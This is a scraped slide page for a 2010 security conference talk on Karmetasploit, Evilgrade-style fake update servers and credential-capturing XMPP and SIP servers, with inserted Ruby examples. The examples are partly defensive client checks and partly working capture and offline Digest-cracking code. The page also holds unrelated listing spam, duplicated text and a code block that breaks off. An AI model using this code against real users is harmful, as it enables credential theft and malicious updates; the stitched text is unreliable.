Veysel Oezer

The Evil Karmetasploit Upgrade

nullcon Goa 2010      http://nullcon.net
Overview
  Introduction
  Background
  Title
  Realization
  Results
  Conclusion
  Demos in between!


Introduction
  IT Security
      Increasing attacks
      also in Germany




Introduction
  Know your enemy!
   ”So it is said that if you know your enemies and know yourself, you will fight without danger in battles. If you only know yourself, but not your opponent, you may win or may lose. If you know neither yourself nor your enemy, you will always endanger yourself.”


Background

  The man in the middle
  The hacker tools
      Evilgrade
      Metasploit
      Karma + Karmetasploit




The man in the middle attack




Known MitM attacks
  ARP spoofing
  DNS spoofing
  BGP hacking
  ICMP redirect, ...
  Karma!
      The evil twin hotspot




Background




                   The hacker tools




Evilgrade

  Framework for attacking weak update mechanisms
  ”The idea... is the centralization and exploitation of different update impl. all together in one tool”
  Written in Perl and published 2007-2008
  Existing modules
      Sun Java
      Apple OS X
Evilgrade

  How does it work




Metasploit
  Vulnerability development framework
      Reduces the work of creating an exploit
  Penetration testing
      Several hundred exploits
  #5 in the top 100 security tools
  Written in Ruby and BSD licensed
  "Don't try to teach yourself how to use Metasploit under the security camera at the airport"
Metasploit architecture




Karma

  The evil twin access point
  MitM attack on Windows XP
  Wireless Zero Configuration...
  Or just name it ”FreeWifi” ;)
  After the MitM, steal authentication data
      HTTP, FTP, POP3, IMAP and so on
  Released in 2004
Karmetasploit
  Reimplementation of Karma in Metasploit
  Fake access point integrated into aircrack-ng
  Authentication capturing implemented as auxiliary modules for Metasploit
  Several improvements
      Better hardware support
      Cookie and form data stealing
      Browser exploitation
Goals
  Evilgrade 2 Metasploit
    Reimplement the functionality as a Metasploit module
    Improve the new system
     • Port sharing, stealth mode, faster Metasploit payload generation
    Transfer the existing Evilgrade modules into the new system
  Create new fake servers
    SIP and XMPP
  Find new vulnerabilities in software
Fake XMPP

  Based on TCP
  Used for Jabber → instant messaging
      Google Talk...
  Has built-in strong security, but depends on server and client
  Cleartext password transmission possible



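Whether a cleartext password ever crosses the wire is decided by the client's mechanism choice, which is what "depends on server and client" means in practice: the server advertises SASL mechanisms in its stream features, and a fake server can advertise PLAIN alone and hope the client obliges. The Ruby below is an added example, not code from the talk, from Metasploit or from any XMPP client; it shows the selection policy a client needs so that a PLAIN-only offer without TLS ends the session instead of leaking the password. The stream features are constructed sample data and the XML parse is deliberately minimal.

```ruby
# Added example: SASL mechanism selection in an XMPP client. Stream features
# below are constructed; a real client uses a proper XML parser.
MECHANISM_PREFERENCE = %w[SCRAM-SHA-256 SCRAM-SHA-1 DIGEST-MD5 PLAIN].freeze

# Mechanisms the server advertises in <stream:features>.
def offered_mechanisms(features_xml)
  features_xml.scan(%r{<mechanism>\s*([^<\s]+)\s*</mechanism>}).flatten
end

def starttls_offered?(features_xml)
  features_xml.include?('<starttls')
end

# Pick the strongest mechanism the server offers that the client knows.
# PLAIN puts the password on the wire in (base64-encoded) cleartext, so it is
# acceptable only once TLS protects the stream; a server that offers nothing
# better and no TLS gets no credentials at all (nil) rather than a downgrade.
def choose_mechanism(features_xml, tls_established:)
  candidates = MECHANISM_PREFERENCE & offered_mechanisms(features_xml) # keeps preference order
  candidates.delete('PLAIN') unless tls_established
  candidates.first
end

# First action of a client that has not negotiated TLS yet: if the server
# offers STARTTLS, do that before looking at mechanisms at all.
def next_step(features_xml, tls_established:)
  return :starttls if !tls_established && starttls_offered?(features_xml)
  mech = choose_mechanism(features_xml, tls_established: tls_established)
  mech ? [:authenticate, mech] : :abort
end

# Constructed: what a genuine server typically advertises.
FEATURES_GENUINE = <<~XML
  <stream:features>
    <starttls xmlns="urn:ietf:params:xml:ns:xmpp-tls"><required/></starttls>
    <mechanisms xmlns="urn:ietf:params:xml:ns:xmpp-sasl">
      <mechanism>SCRAM-SHA-1</mechanism>
      <mechanism>PLAIN</mechanism>
    </mechanisms>
  </stream:features>
XML

# Constructed: what a fake server hoping for a cleartext password advertises.
FEATURES_PLAIN_ONLY = <<~XML
  <stream:features>
    <mechanisms xmlns="urn:ietf:params:xml:ns:xmpp-sasl">
      <mechanism>PLAIN</mechanism>
    </mechanisms>
  </stream:features>
XML

if $PROGRAM_NAME == __FILE__
  p next_step(FEATURES_GENUINE,    tls_established: false) # :starttls
  p next_step(FEATURES_PLAIN_ONLY, tls_established: false) # :abort
end
```

TLS only closes the gap if the client also verifies the server certificate against the domain it wanted to reach; an evil twin that terminates TLS with its own certificate, and a client that clicks through the warning, is the same cleartext leak one layer up.
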
Fake SIP Server

  UDP based protocol
  Redefined in several RFCs
  Authentication similar to HTTP Digest
      Challenge – Response
  Try a downgrade attack to use Basic Authentication



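What a fake SIP server can get out of a client depends entirely on which challenge the client is willing to answer. The Ruby below is an added example, not code from the talk or from Metasploit: a minimal SIP client authenticator that parses a WWW-Authenticate challenge, computes the RFC 2617 style Digest response that SIP reuses, and refuses a Basic challenge outright, which is the downgrade the slide describes. Realm, nonce, user, password and cnonce are constructed values.

```ruby
# Added example: SIP client side of Digest authentication with a downgrade
# check. Challenge values are constructed; the arithmetic is the RFC 2617
# Digest computation that SIP (RFC 3261) reuses.
require 'digest/md5'

# Split %(Digest realm="x", nonce="y", algorithm=MD5) into ["Digest", {...}].
def parse_challenge(header)
  scheme, params = header.strip.split(/\s+/, 2)
  kv = {}
  (params || '').scan(/(\w+)=("([^"]*)"|[^,\s]+)/) do |key, raw, quoted|
    kv[key.downcase] = quoted || raw
  end
  [scheme, kv]
end

# HA1 = MD5(user:realm:password), HA2 = MD5(method:uri)
# response = MD5(HA1:nonce:HA2)                  without qop
# response = MD5(HA1:nonce:nc:cnonce:qop:HA2)    with qop=auth
def digest_response(user, password, realm, nonce, method, uri,
                    qop: nil, nc: '00000001', cnonce: nil)
  ha1 = Digest::MD5.hexdigest("#{user}:#{realm}:#{password}")
  ha2 = Digest::MD5.hexdigest("#{method}:#{uri}")
  if qop
    Digest::MD5.hexdigest("#{ha1}:#{nonce}:#{nc}:#{cnonce}:#{qop}:#{ha2}")
  else
    Digest::MD5.hexdigest("#{ha1}:#{nonce}:#{ha2}")
  end
end

# Client policy: answer Digest, never Basic. A Basic challenge asks for the
# password itself; a client that obliges hands it to whoever sent the 401.
# Returns the Authorization header value, or nil when the challenge is refused.
def answer_challenge(header, user, password, method, uri, cnonce: 'c0ffee42')
  scheme, p = parse_challenge(header)
  return nil unless scheme&.casecmp?('Digest')             # Basic or unknown: refuse
  return nil unless p['realm'] && p['nonce']               # malformed challenge
  return nil if p['algorithm'] && !p['algorithm'].casecmp?('MD5')
  qop = p['qop'].to_s.split(',').map(&:strip).include?('auth') ? 'auth' : nil
  resp = digest_response(user, password, p['realm'], p['nonce'], method, uri,
                         qop: qop, cnonce: qop ? cnonce : nil)
  auth = %(Digest username="#{user}", realm="#{p['realm']}", nonce="#{p['nonce']}", ) +
         %(uri="#{uri}", response="#{resp}", algorithm=MD5)
  auth += %(, qop=auth, nc=00000001, cnonce="#{cnonce}") if qop
  auth
end

# What the server, genuine or fake, receives for each kind of challenge.
def demo
  uri    = 'sip:sip.example.invalid'
  digest = %(Digest realm="sip.example.invalid", nonce="7c1f0d3e", algorithm=MD5)
  basic  = %(Basic realm="sip.example.invalid")
  {
    digest: answer_challenge(digest, 'alice', 'constructed-pw', 'REGISTER', uri),
    basic:  answer_challenge(basic,  'alice', 'constructed-pw', 'REGISTER', uri),
  }
end

p demo if $PROGRAM_NAME == __FILE__
```

What a fake server captures from a Digest exchange is the response hash bound to its own nonce, not the password, which is the difference between the talk's "capturing of Digest authentication is working" and the downgrade that did not succeed; a captured exchange still gives an attacker something to guess a weak password against offline, so strong credentials and SIP over TLS are what close that gap.
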
Realisation

  Environments
  Evilgrade 2 Metasploit
  Authentication capturing servers
  Analysis of update mechanisms




Used tools

  Wireshark
  Jacksum
  VBinDiff
  VMware Workstation
  Netcat
  GHex



Attack Environment




                            DEMO




Realisation E-2-M




Analysis
 1. Install an old version on the target.
 2. Sniff the update process on the attacker.
 3. Analyze network communication.
 4. If possible, try to simulate the update
  server.
 5. If possible, install latest version on
  the target.
 6. Improve server to be version independent.
 7. Improve server to allow to configure
  options, like the description shown as
  update information to the client.
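Every step of the analysis above probes one question: does the client accept update metadata from whoever answers on the network, or only from the vendor? The Ruby sketch below is an added example, not code from the talk, from Evilgrade or from Metasploit. It contrasts a manifest that carries only a package hash (whoever rewrites the package rewrites the hash too) with a manifest signed by a vendor key pinned in the client, which is the property behind the "not hacked" results such as uTorrent's signed data and VLC's PGP. Manifest format, package contents and key handling are constructed for the example.

```ruby
# Added example: hash-only versus signed update manifests. The manifest format
# is constructed for this example and is not any vendor's. Standard library only.
require 'openssl'
require 'digest'

def sha256_hex(data)
  Digest::SHA256.hexdigest(data)
end

# --- Weak design -----------------------------------------------------------
# The manifest names the version and the package hash, nothing more. Anyone who
# can answer the update request (evil twin hotspot, DNS spoofing) hands out a
# tampered package together with a manifest recomputed to match it.
def weak_manifest(version, package)
  "version=#{version}\nsha256=#{sha256_hex(package)}\n"
end

def weak_client_accepts?(manifest, package)
  fields = manifest.lines.to_h { |l| l.chomp.split('=', 2) }
  fields['sha256'] == sha256_hex(package)
end

# --- Signed design ---------------------------------------------------------
# The vendor signs the manifest body with a private key that stays on the build
# system; the client ships with the matching public key pinned. The attacker
# can still deliver any bytes, but cannot produce a manifest the client believes.
def signed_manifest(version, package, vendor_key)
  body = "version=#{version}\nsha256=#{sha256_hex(package)}\n"
  sig  = vendor_key.sign(OpenSSL::Digest.new('SHA256'), body)
  body + "signature=#{[sig].pack('m0')}\n" # m0: base64 without line breaks
end

def signed_client_accepts?(manifest, package, vendor_pub)
  lines    = manifest.lines
  sig_line = lines.find { |l| l.start_with?('signature=') }
  return false unless sig_line
  body = lines.reject { |l| l.start_with?('signature=') }.join
  sig  = sig_line.chomp.delete_prefix('signature=').unpack1('m0')
  # 1. the manifest body must carry a valid vendor signature ...
  return false unless vendor_pub.verify(OpenSSL::Digest.new('SHA256'), sig, body)
  # 2. ... and the package must match the hash inside that signed body
  fields = body.lines.to_h { |l| l.chomp.split('=', 2) }
  fields['sha256'] == sha256_hex(package)
rescue ArgumentError, OpenSSL::PKey::PKeyError
  false # malformed base64 or signature: rejected, never accepted
end

# --- Scenario: a man in the middle answers the update request --------------
def mitm_scenario
  vendor_key   = OpenSSL::PKey::RSA.new(2048) # constructed; stays with the vendor
  attacker_key = OpenSSL::PKey::RSA.new(2048) # constructed; the best an attacker has
  genuine  = 'constructed genuine installer bytes, version 2.0'
  tampered = 'constructed attacker-supplied installer bytes'

  vendor_pub    = vendor_key.public_key # what the client pins
  real_manifest = signed_manifest('2.0', genuine, vendor_key)

  {
    # weak client: the attacker regenerates the manifest, the hash matches, accepted
    weak_accepts_tampered:  weak_client_accepts?(weak_manifest('2.0', tampered), tampered),
    # signed client: genuine manifest with genuine package, accepted
    signed_accepts_genuine: signed_client_accepts?(real_manifest, genuine, vendor_pub),
    # signed client: manifest forged with the attacker's own key, rejected
    signed_accepts_forged:  signed_client_accepts?(signed_manifest('2.0', tampered, attacker_key), tampered, vendor_pub),
    # signed client: genuine manifest replayed next to a swapped package, rejected
    signed_accepts_swapped: signed_client_accepts?(real_manifest, tampered, vendor_pub),
  }
end

p mitm_scenario if $PROGRAM_NAME == __FILE__
```

A signed manifest on its own does not stop an attacker from replaying an older, genuinely signed manifest to push the client back to a version with known bugs, so the client should also refuse any version lower than the one installed. Fetching the manifest over TLS with certificate verification (the Ad-Aware approach in the results) and signing the package itself (VLC's PGP) are the same idea applied at different layers.
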
Results

  Fake SIP and XMPP servers
  Reimplementation of Evilgrade
  Analysis of update implementations
      Not hacked
      Indirect hacks
      Hacked




Results – fake server

  XMPP
      Works
  SIP
      Downgrade attack had no success
      Capturing of Digest Authentication is
      working
  DEMO



Results

  Evilgrade in Metasploit
      Reimplemented the old functionality
      Old modules ported
      Several improvements
       • All mentioned ones
       • Anti-virus bypassing for Metasploit payloads
         ( DEMO at the end if time is left )
       • Some others...



Results – Analysis
  Not hacked
      uTorrent
      Avira Antivir
      Foxit Reader
      VLC uses PGP
      Ad-Aware is the only one that uses SSL
      Spybot, AVG Antivir, Comodo Firewall, Picasa, ZoneAlarm, WinRAR, FlashGet, Camfrog...


Results – Not hacked

  Not hacked
      uTorrent uses binary signed data?!?




Results – Not hacked
  Not hacked
      Avira Antivir

MASTER.IDX
CRDATE=20090505_1833
<3f76d242c16a5491bfe98540f68c36c9>




Results – Not hacked

  Foxit Reader and the fzip file format




Results - Analysis

  Indirect hack
      Skype
      Quicktime
      Orbit Downloader
      Miranda IM
  DEMO




Results – Analysis

  Hacked
      Trillian
      Kerio Firewall
      SuperAntiSpyware
      FileZilla
      GOM Player
      DivX Player




Trillian update mechanism

  Binary update information
      Can you read that?




Results - Hacked




                           DEMO




Conclusion

  Release candidate of the evil karmetasploit upgrade is ready
      No need for Evilgrade anymore
      Several improvements compared to Evilgrade
      New authentication capturing servers
      Several weak update implementations found,
      over 100 million downloads from www.cnet.com
Conclusion
  Feature list for version 2
      SIP downgrade attack on old SIP hardware
      Fake server XMPP over HTTP
      Improve design to handle Avira Antivir
  Feature list for version 3
      Advanced stealth mode
       • Intelligent fake DNS server
      Find more vulnerabilities

Conclusion
  Software developers
    Please make secure software
    Use standards and deny weak stuff by default
  And for the rest of us
      Be aware of these attack vectors
      Do not install every ”important security update”
      Do not trust security software by default
      Do not trust the Internet, especially (public) Wifi networks
That's it!




                     Q & A





Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoffsammart93
 

Kürzlich hochgeladen (20)

Corporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxCorporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptx
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 
AXA XL - Insurer Innovation Award Americas 2024
AXA XL - Insurer Innovation Award Americas 2024AXA XL - Insurer Innovation Award Americas 2024
AXA XL - Insurer Innovation Award Americas 2024
 
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
Ransomware_Q4_2023. The report. [EN].pdf
Ransomware_Q4_2023. The report. [EN].pdfRansomware_Q4_2023. The report. [EN].pdf
Ransomware_Q4_2023. The report. [EN].pdf
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native Applications
 
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
Navi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Navi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot ModelNavi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Navi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot Model
 
Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...
Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...
Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 

nullcon 2010 - The evil karmetasploit upgrade

  • 1. Veysel Oezer: The Evil Karmetasploit Upgrade. nullcon Goa 2010, http://nullcon.net
  • 2. Overview: Introduction; Background; Title; Realization; Results; Conclusion; demos in between!
  • 3. Introduction: IT security, increasing attacks.
  • 4. Introduction: IT security, increasing attacks, also in Germany.
  • 5. Introduction: Know your enemy! "So it is said that if you know your enemies and know yourself, you will fight without danger in battles. If you only know yourself, but not your opponent, you may win or may lose. If you know neither yourself nor your enemy, you will always endanger yourself."
  • 6. Background: The man in the middle; the hacker tools: Evilgrade, Metasploit, Karma + Karmetasploit.
  • 7. The man in the middle attack.
  • 8. Known MitM attacks: ARP spoofing, DNS spoofing, BGP hacking, ICMP redirect, ... and Karma! The evil twin hotspot.
  • 9. Background: The hacker tools.
  • 10. Evilgrade: Framework for attacking weak update mechanisms. "The idea.. is the centralization and exploitation of different update implementations all together in one tool." Written in Perl and published 2007-2008. Existing modules: Sun Java, Apple OS X.
  • 11. Evilgrade: How does it work?
  • 12. Evilgrade.
  • 13. Evilgrade.
  • 14. Metasploit: Vulnerability development framework (reduces the work of creating an exploit); penetration testing; several hundred exploits; #5 in the top 100 security tools; written in Ruby and BSD licensed. "Don't try to teach yourself how to use metasploit under the security camera at the airport."
  • 16. Karma: The evil twin access point. MitM attack on the Windows XP Wireless Zero Configuration... or just name it "FreeWifi" ;). After the MitM, steal authentication data: HTTP, FTP, POP3, IMAP and so on. Released in 2004.
  • 17. Karmetasploit: Reimplementation of Karma in Metasploit. The fake access point is integrated into aircrack-ng; authentication capturing is implemented as auxiliary modules for Metasploit. Several improvements: better hardware support, cookie and form data stealing, browser exploitation.
  • 18. Goals: Evilgrade 2 Metasploit: reimplement the functionality as Metasploit modules; improve the new system (port sharing, stealth mode, faster Metasploit payload generation); transfer the existing Evilgrade modules into the new system; create new fake servers: SIP and XMPP; find new vulnerabilities in software.
  • 19. Fake XMPP: TCP based. Used for Jabber → instant messaging, Google Talk... Has built-in strong security, but whether it is used depends on server and client. Cleartext password transmission is possible.
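The cleartext case from slide 19 in code, as an added example in plain Ruby and not the talk's Metasploit auxiliary module: the fake server advertises only the SASL PLAIN mechanism, and a client that accepts that over an unencrypted stream sends its password as the base64 of NUL user NUL password (RFC 4616), which the server simply decodes. The stanza, user name and password are constructed sample data; unlike a Metasploit module this snippet does no socket or stream handling and uses a regex on a single stanza rather than a full XML stream parser. A client that insists on STARTTLS or a stronger mechanism is not caught, which is the "depends on server and client" caveat from the slide.

```ruby
# Mechanism list the fake XMPP server advertises: PLAIN only. A client that does
# not insist on STARTTLS or a stronger SASL mechanism then authenticates in the clear.
def fake_stream_features
  '<stream:features>' \
  '<mechanisms xmlns="urn:ietf:params:xml:ns:xmpp-sasl"><mechanism>PLAIN</mechanism></mechanisms>' \
  '</stream:features>'
end

# Extract the credential from a SASL PLAIN <auth> stanza. The RFC 4616 payload is
# authzid NUL authcid NUL passwd, base64-encoded. Returns nil for any other
# mechanism or for a malformed payload so the caller can fall through.
def capture_plain_credentials(stanza)
  m = stanza.match(%r{<auth\b[^>]*mechanism=["']PLAIN["'][^>]*>([A-Za-z0-9+/=\s]*)</auth>})
  return nil unless m
  decoded = m[1].delete(" \t\r\n").unpack1('m')   # 'm' = base64 decode
  parts = decoded.split("\x00", -1)               # keep the empty authzid
  return nil unless parts.length == 3
  { authzid: parts[0], user: parts[1], password: parts[2] }
end

# Constructed client stanza, as a client downgraded to PLAIN would send it
# (sample user "alice", sample password "s3cret").
SAMPLE_AUTH_STANZA =
  '<auth xmlns="urn:ietf:params:xml:ns:xmpp-sasl" mechanism="PLAIN">' +
  ["\x00alice\x00s3cret"].pack('m0') +           # 'm0' = base64 without newlines
  '</auth>'

if __FILE__ == $PROGRAM_NAME
  p capture_plain_credentials(SAMPLE_AUTH_STANZA)
end
```

The fake server sends `fake_stream_features` right after the stream header; the captured credential is what the talk's demo then shows on the Metasploit console.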
  • 20. Fake SIP server: UDP based protocol, redefined in several RFCs. Authentication similar to HTTP Digest (challenge-response). Try a downgrade attack to Basic Authentication.
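The Digest exchange from slide 20, as an added example in plain Ruby (not the talk's Metasploit module): the fake registrar answers the first REGISTER with a 401 whose realm and nonce it chooses, parses the Authorization header of the retried REGISTER, and checks the captured response offline against candidate passwords using the RFC 2617 formula that RFC 3261 section 22 reuses for SIP. Realm, nonce, user name and password below are constructed sample data. Two caveats a practitioner should keep in mind: RFC 3261 deprecates Basic authentication for SIP, so a standards-conforming phone will not answer a Basic challenge, which is consistent with the downgrade result the talk reports later; and because the nonce is attacker-chosen, a captured Digest response is enough for an offline dictionary attack even though the password itself never crosses the wire.

```ruby
require 'digest/md5'

# Fake registrar side: reject the first REGISTER with 401 and a Digest challenge
# whose realm and nonce the attacker picks. No qop, so the client computes the
# original RFC 2617 response without cnonce/nc.
def sip_digest_challenge(realm, nonce)
  "SIP/2.0 401 Unauthorized\r\n" \
  "WWW-Authenticate: Digest realm=\"#{realm}\", nonce=\"#{nonce}\", algorithm=MD5\r\n" \
  "Content-Length: 0\r\n\r\n"
end

# Parse the Authorization header of the client's retried REGISTER into a hash of
# parameter name => value. Returns nil when the request carries no Digest header.
def parse_sip_authorization(message)
  line = message.lines.find { |l| l.match?(/\AAuthorization:\s*Digest\s/i) }
  return nil unless line
  params = {}
  line.sub(/\AAuthorization:\s*Digest\s*/i, '').scan(/(\w+)=("([^"]*)"|[^,\s]+)/) do |k, v, quoted|
    params[k] = quoted.nil? ? v : quoted
  end
  params
end

# RFC 2617 response for algorithm=MD5 without qop:
# MD5(MD5(user:realm:pass) : nonce : MD5(method:uri))
def digest_response(user, realm, password, method, uri, nonce)
  ha1 = Digest::MD5.hexdigest("#{user}:#{realm}:#{password}")
  ha2 = Digest::MD5.hexdigest("#{method}:#{uri}")
  Digest::MD5.hexdigest("#{ha1}:#{nonce}:#{ha2}")
end

# Offline check of a captured Authorization header against candidate passwords.
# Returns the matching password or nil. Nothing is sent to the victim or to the
# real registrar; the captured challenge/response pair alone is enough.
def crack_sip_digest(auth, method, candidates)
  candidates.find do |pw|
    digest_response(auth['username'], auth['realm'], pw, method, auth['uri'], auth['nonce']) == auth['response']
  end
end

# Constructed exchange: the fake server's challenge and the client's answer for
# the weak sample password "letmein". The nonce is fixed so the sample is reproducible.
REALM = 'sip.example.test'
NONCE = '4f3c9a1d7b2e'
CHALLENGE = sip_digest_challenge(REALM, NONCE)
CLIENT_REGISTER =
  "REGISTER sip:#{REALM} SIP/2.0\r\n" \
  "Authorization: Digest username=\"bob\", realm=\"#{REALM}\", nonce=\"#{NONCE}\", " \
  "uri=\"sip:#{REALM}\", response=\"#{digest_response('bob', REALM, 'letmein', 'REGISTER', "sip:#{REALM}", NONCE)}\", " \
  "algorithm=MD5\r\n" \
  "Content-Length: 0\r\n\r\n"

if __FILE__ == $PROGRAM_NAME
  auth = parse_sip_authorization(CLIENT_REGISTER)
  puts "captured response for #{auth['username']}@#{auth['realm']}: #{auth['response']}"
  puts "offline match: #{crack_sip_digest(auth, 'REGISTER', %w[password 123456 letmein]).inspect}"
end
```

A real phone retries with the same nonce the fake server issued, so the server can store the nonce per source address and feed the pair to `crack_sip_digest` (or to a proper cracker) later; MD5 of three short strings is cheap enough that long, random passwords are the only defence on the victim's side.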
  • 21. Realisation: Environments; Evilgrade 2 Metasploit; authentication capturing servers; analysis of update mechanisms.
  • 22. Used tools: Wireshark, Jacksum, VBinDiff, VMware Workstation, Netcat, GHex.
  • 23. Attack environment. DEMO
  • 25. Fake XMPP.
  • 27. Analysis: 1. Install an old version on the target. 2. Sniff the update process on the attacker. 3. Analyze the network communication. 4. If possible, try to simulate the update server. 5. If possible, install the latest version on the target. 6. Improve the server to be version independent. 7. Improve the server to allow configurable options, like the description shown to the client as update information.
  • 28. Results: Fake SIP and XMPP servers; reimplementation of Evilgrade; analysis of update implementations: not hacked, indirect hacks, hacked.
  • 29. Results - fake servers: XMPP works. SIP: the downgrade attack had no success, but capturing of Digest authentication is working. DEMO
  • 30. Results - Evilgrade in Metasploit: the old functionality is reimplemented; the old modules are ported; several improvements: all the ones mentioned, anti-virus bypassing for Metasploit payloads (DEMO at the end if time is left), some others...
  • 31. Results - Analysis. Not hacked: uTorrent; Avira Antivir; Foxit Reader; VLC (uses PGP); Ad-Aware (the only one that uses SSL); Spybot, AVG Antivir, Comodo Firewall, Picasa, ZoneAlarm, WinRAR, FlashGet, Camfrog...
  • 32. Results - Not hacked: uTorrent uses binary signed data ?!?
  • 33. Results - Not hacked: Avira Antivir. ---MASTER.IDX--- CRDATE=20090505_1833 <3f76d242c16a5491bfe98540f68c36c9>
  • 34. Results - Not hacked: Foxit Reader and the fzip file format.
  • 35. Results - Analysis. Indirect hack: Skype, QuickTime, Orbit Downloader, Miranda IM. DEMO
  • 36. Results - Analysis. Hacked: Trillian, Kerio Firewall, SuperAntiSpyware, FileZilla, GOM Player, DivX Player.
  • 37. Trillian update mechanism: binary update information. Can you read that?
  • 38. Trillian update mechanism: binary update information.
  • 39. Results - Hacked. DEMO
  • 40. Conclusion: The release candidate of the evil Karmetasploit upgrade is ready; no need for Evilgrade anymore; several improvements compared to Evilgrade; new authentication capturing servers; several weak update implementations found, in software with over 100 million downloads on www.cnet.com.
  • 41. Conclusion - Feature list for version 2: SIP downgrade attack on old SIP hardware; fake XMPP over HTTP server; improve the design to handle Avira Antivir. Feature list for version 3: advanced stealth mode (intelligent fake DNS server); find more vulnerabilities.
  • 42. Conclusion. Software developers: please make secure software; use standards and deny weak stuff by default. And for the rest of us: be aware of these attack vectors; do not install every "important security update"; do not trust security software by default; do not trust the Internet, especially (public) WiFi networks.
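The two ends of the update attack in one added example, in plain Ruby and not code from the talk or from Metasploit: step 7 of the analysis procedure on slide 27 (a fake update server whose "update description" is configurable) and the "use standards and deny weak stuff by default" advice on slide 42. The JSON manifest format, the vendor and attacker keys, the URLs and the installer bytes are all constructed for this example and do not describe any of the products named on the results slides. The weak client accepts any well-formed manifest, which is what the "hacked" group amounts to; the hardened client requires a signature by a pinned vendor key over the exact manifest bytes, an HTTPS download URL, a sane digest field and a version newer than the installed one, so the same MitM response is rejected.

```ruby
require 'openssl'
require 'json'

# Hypothetical JSON manifest format, constructed for this example (not any vendor's
# real format): newest version, download URL, SHA-256 of the file and a free-text
# description that the client shows to the user before installing.
def update_manifest(version:, url:, sha256:, description:)
  JSON.generate('version' => version, 'url' => url, 'sha256' => sha256,
                'description' => description)
end

# What an Evilgrade-style fake update server hands to the victim: same shape as the
# genuine manifest, but URL, version and wording are attacker-chosen (slide 27, step 7).
def fake_update_manifest(payload_url:, description: 'Important security update')
  update_manifest(version: '99.0', url: payload_url,
                  sha256: OpenSSL::Digest::SHA256.hexdigest('attacker payload bytes'),
                  description: description)
end

# Weak client: trusts anything that parses and names a version and a URL.
# Nothing ties the manifest to the vendor, so the MitM response is accepted.
def weak_client_accepts?(manifest_json)
  m = JSON.parse(manifest_json)
  m.key?('version') && m.key?('url')
rescue JSON::ParserError
  false
end

# Vendor side of the hardened scheme: detached RSA/SHA-256 signature over the
# exact manifest bytes, base64-encoded for transport.
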